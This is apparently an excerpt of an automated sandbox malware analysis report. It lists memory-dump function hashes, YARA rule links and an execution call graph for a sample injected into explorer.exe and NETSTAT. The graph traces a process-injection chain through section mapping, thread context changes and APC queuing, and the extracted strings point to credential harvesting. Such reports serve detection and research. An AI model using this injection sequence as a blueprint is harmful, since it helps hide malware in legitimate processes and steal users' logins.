                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                                                                  • API String ID: 0-319646191
                                                                                                                                                                                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                  • Instruction ID: bfd59aeed2bd94c4beb4bbce9386ee92035a08c945b6cfa6917a725507c567c3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D21CE70A10B0D8ACB04EFA9C8947EDBBA0FF58204F40422ED55AD7252DE7886098B89
                                                                                                                                                                                  Function 0F6F3E94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: .$l$l$t
                                                                                                                                                                                  • API String ID: 0-168566397
                                                                                                                                                                                  • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                                  • Instruction ID: 5a482a7089eb255435713aba8522f16ea1f087a799cdf1a4d7a3c834eb57d98a
                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                                                                  • Instruction Fuzzy Hash: E3215A70A24B0E9BDB48EFA8D4447EEBBF1FB58304F50462ED109D3601DB7995958B88
                                                                                                                                                                                  Function 0F6F3E92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: .$l$l$t
                                                                                                                                                                                  • API String ID: 0-168566397
                                                                                                                                                                                  • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                                  • Instruction ID: 2103bff5de70ea719a5e5767bbb5d83d7f5dffa5763941771d2733da219b9186
                                                                                                                                                                                  • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C217A70A24B0E9BDB48EFA8C4447AEBAF1FF58300F50462ED109D3611DB789595CB88
                                                                                                                                                                                  Function 0F6F3FF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000006.00000002.4161036180.000000000F650000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F650000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_f650000_explorer.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: auth$logi$pass$user
                                                                                                                                                                                  • API String ID: 0-2393853802
                                                                                                                                                                                  • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                                  • Instruction ID: 66271487f2cdbb6ff7a527266f797930b883df96f1eb625432f86e018c6213cb
                                                                                                                                                                                  • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                                                                  • Instruction Fuzzy Hash: A221A13062470D4BCB05DF9D98807DEB7E1EF88344F00461AA40ADB345DBB4D9548BC6

                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:1.7%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:6.8%
                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                  Total number of Nodes:621
                                                                                                                                                                                  Total number of Limit Nodes:74
                                                                                                                                                                                  execution_graph 103989 3112ad0 LdrInitializeThunk 103992 26bf0fd 103995 26bb9a0 103992->103995 103996 26bb9c6 103995->103996 104003 26a9d40 103996->104003 103998 26bb9d2 103999 26bb9f6 103998->103999 104011 26a8f30 103998->104011 104049 26ba680 103999->104049 104052 26a9c90 104003->104052 104005 26a9d4d 104006 26a9d54 104005->104006 104064 26a9c30 104005->104064 104006->103998 104012 26a8f57 104011->104012 104481 26ab1c0 104012->104481 104014 26a8f69 104485 26aaf10 104014->104485 104016 26a8f86 104018 26a8f8d 104016->104018 104556 26aae40 LdrLoadDll 104016->104556 104019 26a90f2 104018->104019 104489 26af380 104018->104489 104019->103999 104021 26a8ffc 104501 26af410 104021->104501 104023 26a9006 104023->104019 104024 26bbf60 2 API calls 104023->104024 104025 26a902a 104024->104025 104026 26bbf60 2 API calls 104025->104026 104027 26a903b 104026->104027 104028 26bbf60 2 API calls 104027->104028 104029 26a904c 104028->104029 104513 26aca90 104029->104513 104031 26a9059 104032 26b4a50 8 API calls 104031->104032 104033 26a9066 104032->104033 104034 26b4a50 8 API calls 104033->104034 104035 26a9077 104034->104035 104036 26a9084 104035->104036 104037 26a90a5 104035->104037 104523 26ad620 104036->104523 104039 26b4a50 8 API calls 104037->104039 104045 26a90c1 104039->104045 104042 26a90e9 104043 26a8d00 23 API calls 104042->104043 104043->104019 104044 26a9092 104539 26a8d00 104044->104539 104045->104042 104557 26ad6c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 104045->104557 104050 26baf30 LdrLoadDll 104049->104050 104051 26ba69f 104050->104051 104053 26a9ca3 104052->104053 104103 26b8b90 LdrLoadDll 104052->104103 104083 26b8a40 104053->104083 104056 26a9cb6 104056->104005 104057 26a9cac 104057->104056 104086 26bb280 104057->104086 104059 26a9cf3 104059->104056 104097 26a9ab0 104059->104097 104061 26a9d13 104104 26a9620 LdrLoadDll 104061->104104 104063 26a9d25 104063->104005 104065 26a9c4a 104064->104065 104066 26bb570 LdrLoadDll 104064->104066 104455 26bb570 104065->104455 104066->104065 104069 26bb570 LdrLoadDll 104070 26a9c71 104069->104070 104071 26af180 104070->104071 104072 26af199 104071->104072 104464 26ab040 104072->104464 104074 26af1ac 104076 26af1bb 104074->104076 104476 26ba1b0 104074->104476 104082 26a9d65 104076->104082 104468 26ba7a0 104076->104468 104078 26af1d2 104079 26af1fd 104078->104079 104471 26ba230 104078->104471 104080 26ba460 2 API calls 104079->104080 104080->104082 104082->103998 104105 26ba5d0 104083->104105 104087 26bb299 104086->104087 104118 26b4a50 104087->104118 104089 26bb2b1 104090 26bb2ba 104089->104090 104157 26bb0c0 104089->104157 104090->104059 104092 26bb2ce 104092->104090 104175 26b9ed0 104092->104175 104433 26a7ea0 104097->104433 104099 26a9ad1 104099->104061 104100 26a9aca 104100->104099 104446 26a8160 104100->104446 104103->104053 104104->104063 104108 26baf30 104105->104108 104107 26b8a55 104107->104057 104109 26baf40 104108->104109 104110 26baf62 104108->104110 104112 26b4e50 104109->104112 104110->104107 104113 26b4e6a 104112->104113 104114 26b4e5e 104112->104114 104113->104110 104114->104113 104117 26b52d0 LdrLoadDll 104114->104117 104116 26b4fbc 104116->104110 104117->104116 104119 26b4d85 104118->104119 104120 26b4a64 104118->104120 104119->104089 104120->104119 104183 26b9c20 104120->104183 104123 26b4b73 104243 26ba430 LdrLoadDll 104123->104243 104124 26b4b90 104186 26ba330 104124->104186 104127 26b4bb7 104129 26bbd90 2 API calls 104127->104129 104128 26b4b7d 104128->104089 104131 26b4bc3 104129->104131 104130 26b4d49 104133 26ba460 2 API calls 104130->104133 104131->104128 104131->104130 104132 26b4d5f 104131->104132 104137 26b4c52 104131->104137 104252 26b4790 LdrLoadDll NtReadFile NtClose 104132->104252 104135 26b4d50 104133->104135 104135->104089 104136 26b4d72 104136->104089 104138 26b4cb9 104137->104138 104140 26b4c61 104137->104140 104138->104130 104139 26b4ccc 104138->104139 104245 26ba2b0 104139->104245 104142 26b4c7a 104140->104142 104143 26b4c66 104140->104143 104146 26b4c7f 104142->104146 104147 26b4c97 104142->104147 104244 26b4650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 104143->104244 104189 26b46f0 104146->104189 104147->104135 104201 26b4410 104147->104201 104149 26b4c70 104149->104089 104152 26b4d2c 104249 26ba460 104152->104249 104153 26b4c8d 104153->104089 104154 26b4caf 104154->104089 104156 26b4d38 104156->104089 104158 26bb0d1 104157->104158 104159 26bb0e3 104158->104159 104270 26bbd10 104158->104270 104159->104092 104161 26bb104 104273 26b4070 104161->104273 104163 26bb150 104163->104092 104164 26bb127 104164->104163 104165 26b4070 3 API calls 104164->104165 104168 26bb149 104165->104168 104167 26bb1da 104169 26bb1ea 104167->104169 104399 26baed0 LdrLoadDll 104167->104399 104168->104163 104305 26b5390 104168->104305 104315 26bad40 104169->104315 104172 26bb218 104394 26b9e90 104172->104394 104176 26b9eec 104175->104176 104177 26baf30 LdrLoadDll 104175->104177 104427 3112c0a 104176->104427 104177->104176 104178 26b9f07 104180 26bbd90 104178->104180 104430 26ba640 104180->104430 104182 26bb329 104182->104059 104184 26baf30 LdrLoadDll 104183->104184 104185 26b4b44 104184->104185 104185->104123 104185->104124 104185->104128 104187 26ba34c NtCreateFile 104186->104187 104188 26baf30 LdrLoadDll 104186->104188 104187->104127 104188->104187 104190 26b470c 104189->104190 104191 26ba2b0 LdrLoadDll 104190->104191 104192 26b472d 104191->104192 104193 26b4748 104192->104193 104194 26b4734 104192->104194 104196 26ba460 2 API calls 104193->104196 104195 26ba460 2 API calls 104194->104195 104197 26b473d 104195->104197 104198 26b4751 104196->104198 104197->104153 104253 26bbfa0 LdrLoadDll RtlAllocateHeap 104198->104253 104200 26b475c 104200->104153 104202 26b445b 104201->104202 104203 26b448e 104201->104203 104204 26ba2b0 LdrLoadDll 104202->104204 104205 26b45d9 104203->104205 104209 26b44aa 104203->104209 104206 26b4476 104204->104206 104207 26ba2b0 LdrLoadDll 104205->104207 104208 26ba460 2 API calls 104206->104208 104213 26b45f4 104207->104213 104210 26b447f 104208->104210 104211 26ba2b0 LdrLoadDll 104209->104211 104210->104154 104212 26b44c5 104211->104212 104215 26b44cc 104212->104215 104216 26b44e1 104212->104216 104266 26ba2f0 LdrLoadDll 104213->104266 104218 26ba460 2 API calls 104215->104218 104219 26b44e6 104216->104219 104225 26b44fc 104216->104225 104217 26b462e 104221 26ba460 2 API calls 104217->104221 104222 26b44d5 104218->104222 104220 26ba460 2 API calls 104219->104220 104223 26b44ef 104220->104223 104226 26b4639 104221->104226 104222->104154 104223->104154 104224 26b4501 104230 26b4513 104224->104230 104257 26ba3e0 104224->104257 104225->104224 104254 26bbf60 104225->104254 104226->104154 104229 26b4567 104231 26b457e 104229->104231 104265 26ba270 LdrLoadDll 104229->104265 104230->104154 104233 26b459a 104231->104233 104234 26b4585 104231->104234 104236 26ba460 2 API calls 104233->104236 104235 26ba460 2 API calls 104234->104235 104235->104230 104237 26b45a3 104236->104237 104238 26b45cf 104237->104238 104260 26bbb60 104237->104260 104238->104154 104240 26b45ba 104241 26bbd90 2 API calls 104240->104241 104242 26b45c3 104241->104242 104242->104154 104243->104128 104244->104149 104246 26baf30 LdrLoadDll 104245->104246 104247 26b4d14 104246->104247 104248 26ba2f0 LdrLoadDll 104247->104248 104248->104152 104250 26baf30 LdrLoadDll 104249->104250 104251 26ba47c NtClose 104250->104251 104251->104156 104252->104136 104253->104200 104267 26ba600 104254->104267 104256 26bbf78 104256->104224 104258 26baf30 LdrLoadDll 104257->104258 104259 26ba3fc NtReadFile 104258->104259 104259->104229 104261 26bbb6d 104260->104261 104262 26bbb84 104260->104262 104261->104262 104263 26bbf60 2 API calls 104261->104263 104262->104240 104264 26bbb9b 104263->104264 104264->104240 104265->104231 104266->104217 104268 26baf30 LdrLoadDll 104267->104268 104269 26ba61c RtlAllocateHeap 104268->104269 104269->104256 104271 26bbd3d 104270->104271 104400 26ba510 104270->104400 104271->104161 104274 26b4081 104273->104274 104275 26b4089 104273->104275 104274->104164 104304 26b435c 104275->104304 104403 26bcf00 104275->104403 104277 26b40dd 104278 26bcf00 2 API calls 104277->104278 104282 26b40e8 104278->104282 104279 26b4136 104281 26bcf00 2 API calls 104279->104281 104285 26b414a 104281->104285 104282->104279 104283 26bd030 3 API calls 104282->104283 104414 26bcfa0 LdrLoadDll RtlAllocateHeap RtlFreeHeap 104282->104414 104283->104282 104284 26b41a7 104286 26bcf00 2 API calls 104284->104286 104285->104284 104408 26bd030 104285->104408 104292 26b41bd 104286->104292 104288 26b41fa 104289 26bcf00 2 API calls 104288->104289 104291 26b4205 104289->104291 104290 26bd030 3 API calls 104290->104292 104293 26bd030 3 API calls 104291->104293 104300 26b423f 104291->104300 104292->104288 104292->104290 104293->104291 104295 26b4334 104416 26bcf60 LdrLoadDll RtlFreeHeap 104295->104416 104297 26b433e 104417 26bcf60 LdrLoadDll RtlFreeHeap 104297->104417 104299 26b4348 104418 26bcf60 LdrLoadDll RtlFreeHeap 104299->104418 104415 26bcf60 LdrLoadDll RtlFreeHeap 104300->104415 104302 26b4352 104419 26bcf60 LdrLoadDll RtlFreeHeap 104302->104419 104304->104164 104306 26b53a1 104305->104306 104307 26b4a50 8 API calls 104306->104307 104309 26b53b7 104307->104309 104308 26b540a 104308->104167 104309->104308 104310 26b53f2 104309->104310 104311 26b5405 104309->104311 104312 26bbd90 2 API calls 104310->104312 104313 26bbd90 2 API calls 104311->104313 104314 26b53f7 104312->104314 104313->104308 104314->104167 104420 26bac00 104315->104420 104318 26bac00 LdrLoadDll 104319 26bad5d 104318->104319 104320 26bac00 LdrLoadDll 104319->104320 104321 26bad66 104320->104321 104322 26bac00 LdrLoadDll 104321->104322 104323 26bad6f 104322->104323 104324 26bac00 LdrLoadDll 104323->104324 104325 26bad78 104324->104325 104326 26bac00 LdrLoadDll 104325->104326 104327 26bad81 104326->104327 104328 26bac00 LdrLoadDll 104327->104328 104329 26bad8d 104328->104329 104330 26bac00 LdrLoadDll 104329->104330 104331 26bad96 104330->104331 104332 26bac00 LdrLoadDll 104331->104332 104333 26bad9f 104332->104333 104334 26bac00 LdrLoadDll 104333->104334 104335 26bada8 104334->104335 104336 26bac00 LdrLoadDll 104335->104336 104337 26badb1 104336->104337 104338 26bac00 LdrLoadDll 104337->104338 104339 26badba 104338->104339 104340 26bac00 LdrLoadDll 104339->104340 104341 26badc6 104340->104341 104342 26bac00 LdrLoadDll 104341->104342 104343 26badcf 104342->104343 104344 26bac00 LdrLoadDll 104343->104344 104345 26badd8 104344->104345 104346 26bac00 LdrLoadDll 104345->104346 104347 26bade1 104346->104347 104348 26bac00 LdrLoadDll 104347->104348 104349 26badea 104348->104349 104350 26bac00 LdrLoadDll 104349->104350 104351 26badf3 104350->104351 104352 26bac00 LdrLoadDll 104351->104352 104353 26badff 104352->104353 104354 26bac00 LdrLoadDll 104353->104354 104355 26bae08 104354->104355 104356 26bac00 LdrLoadDll 104355->104356 104357 26bae11 104356->104357 104358 26bac00 LdrLoadDll 104357->104358 104359 26bae1a 104358->104359 104360 26bac00 LdrLoadDll 104359->104360 104361 26bae23 104360->104361 104362 26bac00 LdrLoadDll 104361->104362 104363 26bae2c 104362->104363 104364 26bac00 LdrLoadDll 104363->104364 104365 26bae38 104364->104365 104366 26bac00 LdrLoadDll 104365->104366 104367 26bae41 104366->104367 104368 26bac00 LdrLoadDll 104367->104368 104369 26bae4a 104368->104369 104370 26bac00 LdrLoadDll 104369->104370 104371 26bae53 104370->104371 104372 26bac00 LdrLoadDll 104371->104372 104373 26bae5c 104372->104373 104374 26bac00 LdrLoadDll 104373->104374 104375 26bae65 104374->104375 104376 26bac00 LdrLoadDll 104375->104376 104377 26bae71 104376->104377 104378 26bac00 LdrLoadDll 104377->104378 104379 26bae7a 104378->104379 104380 26bac00 LdrLoadDll 104379->104380 104381 26bae83 104380->104381 104382 26bac00 LdrLoadDll 104381->104382 104383 26bae8c 104382->104383 104384 26bac00 LdrLoadDll 104383->104384 104385 26bae95 104384->104385 104386 26bac00 LdrLoadDll 104385->104386 104387 26bae9e 104386->104387 104388 26bac00 LdrLoadDll 104387->104388 104389 26baeaa 104388->104389 104390 26bac00 LdrLoadDll 104389->104390 104391 26baeb3 104390->104391 104392 26bac00 LdrLoadDll 104391->104392 104393 26baebc 104392->104393 104393->104172 104395 26baf30 LdrLoadDll 104394->104395 104396 26b9eac 104395->104396 104426 3112df0 LdrInitializeThunk 104396->104426 104397 26b9ec3 104397->104092 104399->104169 104401 26ba52c NtAllocateVirtualMemory 104400->104401 104402 26baf30 LdrLoadDll 104400->104402 104401->104271 104402->104401 104404 26bcf10 104403->104404 104405 26bcf16 104403->104405 104404->104277 104406 26bbf60 2 API calls 104405->104406 104407 26bcf3c 104406->104407 104407->104277 104409 26bcfa0 104408->104409 104410 26bbf60 2 API calls 104409->104410 104411 26bcffd 104409->104411 104412 26bcfda 104410->104412 104411->104285 104413 26bbd90 2 API calls 104412->104413 104413->104411 104414->104282 104415->104295 104416->104297 104417->104299 104418->104302 104419->104304 104421 26bac1b 104420->104421 104422 26b4e50 LdrLoadDll 104421->104422 104423 26bac3b 104422->104423 104424 26b4e50 LdrLoadDll 104423->104424 104425 26bace7 104423->104425 104424->104425 104425->104318 104426->104397 104428 3112c11 104427->104428 104429 3112c1f LdrInitializeThunk 104427->104429 104428->104178 104429->104178 104431 26baf30 LdrLoadDll 104430->104431 104432 26ba65c RtlFreeHeap 104431->104432 104432->104182 104434 26a7eab 104433->104434 104435 26a7eb0 104433->104435 104434->104100 104436 26bbd10 2 API calls 104435->104436 104437 26a7ed5 104436->104437 104438 26a7f38 104437->104438 104439 26b9e90 2 API calls 104437->104439 104440 26a7f3e 104437->104440 104444 26bbd10 2 API calls 104437->104444 104449 26ba590 104437->104449 104438->104100 104439->104437 104441 26a7f64 104440->104441 104443 26ba590 2 API calls 104440->104443 104441->104100 104445 26a7f55 104443->104445 104444->104437 104445->104100 104447 26ba590 2 API calls 104446->104447 104448 26a817e 104447->104448 104448->104061 104450 26baf30 LdrLoadDll 104449->104450 104451 26ba5ac 104450->104451 104451->104437 104452 26ba5cc 104451->104452 104454 3112c70 LdrInitializeThunk 104451->104454 104454->104451 104456 26bb593 104455->104456 104459 26aacf0 104456->104459 104458 26a9c5b 104458->104069 104461 26aad14 104459->104461 104460 26aad1b 104460->104458 104461->104460 104462 26aad67 104461->104462 104463 26aad5d LdrLoadDll 104461->104463 104462->104458 104463->104462 104465 26ab063 104464->104465 104467 26ab0e0 104465->104467 104479 26b9c60 LdrLoadDll 104465->104479 104467->104074 104469 26baf30 LdrLoadDll 104468->104469 104470 26ba7bf LookupPrivilegeValueW 104469->104470 104470->104078 104472 26baf30 LdrLoadDll 104471->104472 104473 26ba24c 104472->104473 104480 3112ea0 LdrInitializeThunk 104473->104480 104474 26ba26b 104474->104079 104477 26baf30 LdrLoadDll 104476->104477 104478 26ba1cc 104477->104478 104478->104076 104479->104467 104480->104474 104482 26ab1f0 104481->104482 104483 26ab040 LdrLoadDll 104482->104483 104484 26ab204 104483->104484 104484->104014 104486 26aaf34 104485->104486 104558 26b9c60 LdrLoadDll 104486->104558 104488 26aaf6e 104488->104016 104490 26af3ac 104489->104490 104491 26ab1c0 LdrLoadDll 104490->104491 104492 26af3be 104491->104492 104559 26af290 104492->104559 104495 26af3f1 104499 26ba460 2 API calls 104495->104499 104500 26af402 104495->104500 104496 26af3d9 104497 26af3e4 104496->104497 104498 26ba460 2 API calls 104496->104498 104497->104021 104498->104497 104499->104500 104500->104021 104502 26af43c 104501->104502 104578 26ab2b0 104502->104578 104504 26af44e 104505 26af290 3 API calls 104504->104505 104506 26af45f 104505->104506 104507 26af481 104506->104507 104508 26af469 104506->104508 104511 26ba460 2 API calls 104507->104511 104512 26af492 104507->104512 104509 26af474 104508->104509 104510 26ba460 2 API calls 104508->104510 104509->104023 104510->104509 104511->104512 104512->104023 104514 26acaa6 104513->104514 104515 26acab0 104513->104515 104514->104031 104516 26aaf10 LdrLoadDll 104515->104516 104517 26acb4e 104516->104517 104518 26acb74 104517->104518 104519 26ab040 LdrLoadDll 104517->104519 104518->104031 104520 26acb90 104519->104520 104521 26b4a50 8 API calls 104520->104521 104522 26acbe5 104521->104522 104522->104031 104524 26ad646 104523->104524 104525 26ab040 LdrLoadDll 104524->104525 104526 26ad65a 104525->104526 104582 26ad310 104526->104582 104528 26a908b 104529 26acc00 104528->104529 104530 26acc26 104529->104530 104531 26ab040 LdrLoadDll 104530->104531 104532 26acca9 104530->104532 104531->104532 104533 26ab040 LdrLoadDll 104532->104533 104534 26acd16 104533->104534 104535 26aaf10 LdrLoadDll 104534->104535 104536 26acd7f 104535->104536 104537 26ab040 LdrLoadDll 104536->104537 104538 26ace2f 104537->104538 104538->104044 104611 26af6d0 104539->104611 104541 26a8d14 104552 26a8f25 104541->104552 104616 26b43a0 104541->104616 104543 26a8d70 104543->104552 104619 26a8ab0 104543->104619 104546 26bcf00 2 API calls 104547 26a8db2 104546->104547 104548 26bd030 3 API calls 104547->104548 104553 26a8dc7 104548->104553 104549 26a7ea0 4 API calls 104549->104553 104552->103999 104553->104549 104553->104552 104554 26ac7b0 18 API calls 104553->104554 104555 26a8160 2 API calls 104553->104555 104624 26af670 104553->104624 104628 26af080 21 API calls 104553->104628 104554->104553 104555->104553 104556->104018 104557->104042 104558->104488 104560 26af2aa 104559->104560 104568 26af360 104559->104568 104561 26ab040 LdrLoadDll 104560->104561 104562 26af2cc 104561->104562 104569 26b9f10 104562->104569 104564 26af30e 104572 26b9f50 104564->104572 104567 26ba460 2 API calls 104567->104568 104568->104495 104568->104496 104570 26baf30 LdrLoadDll 104569->104570 104571 26b9f2c 104570->104571 104571->104564 104573 26b9f6c 104572->104573 104574 26baf30 LdrLoadDll 104572->104574 104577 31135c0 LdrInitializeThunk 104573->104577 104574->104573 104575 26af354 104575->104567 104577->104575 104579 26ab2d7 104578->104579 104580 26ab040 LdrLoadDll 104579->104580 104581 26ab313 104580->104581 104581->104504 104583 26ad327 104582->104583 104591 26af710 104583->104591 104587 26ad39b 104588 26ad3a2 104587->104588 104602 26ba270 LdrLoadDll 104587->104602 104588->104528 104590 26ad3b5 104590->104528 104592 26af735 104591->104592 104603 26a81a0 104592->104603 104594 26ad36f 104599 26ba6b0 104594->104599 104595 26b4a50 8 API calls 104597 26af759 104595->104597 104597->104594 104597->104595 104598 26bbd90 2 API calls 104597->104598 104610 26af550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 104597->104610 104598->104597 104600 26baf30 LdrLoadDll 104599->104600 104601 26ba6cf CreateProcessInternalW 104600->104601 104601->104587 104602->104590 104604 26a829f 104603->104604 104605 26a81b5 104603->104605 104604->104597 104605->104604 104606 26b4a50 8 API calls 104605->104606 104607 26a8222 104606->104607 104608 26bbd90 2 API calls 104607->104608 104609 26a8249 104607->104609 104608->104609 104609->104597 104610->104597 104612 26b4e50 LdrLoadDll 104611->104612 104613 26af6ef 104612->104613 104614 26af6fd 104613->104614 104615 26af6f6 SetErrorMode 104613->104615 104614->104541 104615->104614 104629 26af4a0 104616->104629 104618 26b43c6 104618->104543 104620 26bbd10 2 API calls 104619->104620 104623 26a8ad5 104620->104623 104621 26a8cea 104621->104546 104623->104621 104649 26b9850 104623->104649 104625 26af683 104624->104625 104697 26b9e60 104625->104697 104628->104553 104630 26af4bd 104629->104630 104636 26b9f90 104630->104636 104633 26af505 104633->104618 104637 26b9fa6 104636->104637 104638 26baf30 LdrLoadDll 104637->104638 104639 26b9fac 104638->104639 104647 3112f30 LdrInitializeThunk 104639->104647 104640 26af4fe 104640->104633 104642 26b9fe0 104640->104642 104643 26baf30 LdrLoadDll 104642->104643 104644 26b9ffc 104643->104644 104648 3112d10 LdrInitializeThunk 104644->104648 104645 26af52e 104645->104618 104647->104640 104648->104645 104650 26bbf60 2 API calls 104649->104650 104651 26b9867 104650->104651 104670 26a9310 104651->104670 104653 26b9882 104654 26b98a9 104653->104654 104655 26b98c0 104653->104655 104656 26bbd90 2 API calls 104654->104656 104658 26bbd10 2 API calls 104655->104658 104657 26b98b6 104656->104657 104657->104621 104659 26b98fa 104658->104659 104660 26bbd10 2 API calls 104659->104660 104661 26b9913 104660->104661 104667 26b9bb4 104661->104667 104676 26bbd50 LdrLoadDll 104661->104676 104663 26b9b99 104664 26b9ba0 104663->104664 104663->104667 104665 26bbd90 2 API calls 104664->104665 104666 26b9baa 104665->104666 104666->104621 104668 26bbd90 2 API calls 104667->104668 104669 26b9c09 104668->104669 104669->104621 104671 26a9335 104670->104671 104672 26aacf0 LdrLoadDll 104671->104672 104673 26a9368 104672->104673 104675 26a938d 104673->104675 104677 26acf20 104673->104677 104675->104653 104676->104663 104678 26acf4c 104677->104678 104679 26ba1b0 LdrLoadDll 104678->104679 104680 26acf65 104679->104680 104681 26acf6c 104680->104681 104688 26ba1f0 104680->104688 104681->104675 104685 26acfa7 104686 26ba460 2 API calls 104685->104686 104687 26acfca 104686->104687 104687->104675 104689 26ba20c 104688->104689 104690 26baf30 LdrLoadDll 104688->104690 104696 3112ca0 LdrInitializeThunk 104689->104696 104690->104689 104691 26acf8f 104691->104681 104693 26ba7e0 104691->104693 104694 26baf30 LdrLoadDll 104693->104694 104695 26ba7ff 104694->104695 104695->104685 104696->104691 104698 26baf30 LdrLoadDll 104697->104698 104699 26b9e7c 104698->104699 104702 3112dd0 LdrInitializeThunk 104699->104702 104700 26af6ae 104700->104553 104702->104700 104703 2eecb84 104706 2eea042 104703->104706 104705 2eecba5 104707 2eea06b 104706->104707 104708 2eea182 NtQueryInformationProcess 104707->104708 104723 2eea56c 104707->104723 104710 2eea1ba 104708->104710 104709 2eea1ef 104709->104705 104710->104709 104711 2eea2db 104710->104711 104712 2eea290 104710->104712 104713 2eea2fc NtSuspendThread 104711->104713 104735 2ee9de2 NtCreateSection NtMapViewOfSection NtClose 104712->104735 104714 2eea30d 104713->104714 104717 2eea331 104713->104717 104714->104705 104716 2eea2cf 104716->104705 104719 2eea412 104717->104719 104726 2ee9bb2 104717->104726 104720 2eea531 104719->104720 104721 2eea4a6 NtSetContextThread 104719->104721 104722 2eea552 NtResumeThread 104720->104722 104725 2eea4bd 104721->104725 104722->104723 104723->104705 104724 2eea51c NtQueueApcThread 104724->104720 104725->104720 104725->104724 104727 2ee9bf7 104726->104727 104728 2ee9c66 NtCreateSection 104727->104728 104729 2ee9d4e 104728->104729 104730 2ee9ca0 104728->104730 104729->104719 104731 2ee9cc1 NtMapViewOfSection 104730->104731 104731->104729 104732 2ee9d0c 104731->104732 104732->104729 104733 2ee9d88 104732->104733 104734 2ee9dc5 NtClose 104733->104734 104734->104719 104735->104716 104736 26b9050 104737 26bbd10 2 API calls 104736->104737 104739 26b908b 104736->104739 104737->104739 104738 26b916c 104739->104738 104740 26aacf0 LdrLoadDll 104739->104740 104741 26b90c1 104740->104741 104742 26b4e50 LdrLoadDll 104741->104742 104743 26b90dd 104742->104743 104743->104738 104744 26b90f0 Sleep 104743->104744 104747 26b8c70 LdrLoadDll 104743->104747 104748 26b8e80 LdrLoadDll 104743->104748 104744->104743 104747->104743 104748->104743

                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                  Function 02EEA036 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 481nativeCOMMON
                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtQueryInformationProcess.NTDLL ref: 02EEA19F
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000007.00000002.4143613392.0000000002EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: false
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_7_2_2ee0000_NETSTAT.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: InformationProcessQuery
                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                  • API String ID: 1778838933-4108050209
                                                                                                                                                                                  • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                                                                                                                                                  • Instruction ID: 46e4141ede3aceffd525175febe769b5a78d33a667fcf9fbad184bffebc6698c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7CF15E70958A8C8FDFA9EF68C894AEEB7E1FB99304F40562EE44AD7250DF309541CB41
